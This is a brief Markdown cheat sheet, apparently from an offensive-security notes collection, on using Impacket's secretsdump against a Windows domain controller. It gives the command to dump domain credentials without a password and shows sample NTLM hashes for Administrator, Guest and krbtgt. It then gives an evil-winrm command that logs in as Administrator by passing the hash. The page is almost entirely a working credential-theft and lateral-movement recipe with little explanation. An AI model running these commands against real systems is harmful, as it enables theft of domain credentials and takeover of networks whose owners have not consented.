killchain-compendium/post_exploitation/docs/secretsdump.md

24 lines
679 B
Markdown

# Secretsdump
Mimikatz for the network!
* Part of Impacket
## Usage
* IP and domain controller name only.
```sh
secretsdump.py -just-dc -no-pass <dc-name>\$@<dc-ip>
```
* Dumped domain credentials are the result. Example:
```sh
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3f3ef89114fb063e3d7fc23c20f65568:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2179ebfa86eb0e3cbab2bd58f2c946f5:::
```
* NTLM hashes of this dump can be used to feed `evil-winrm`. Example from above as Administrator + Hash
```sh
evil-winrm.rb -i 10.10.15.3 -u Administrator -H 3f3ef89114fb063e3d7fc23c20f65568
```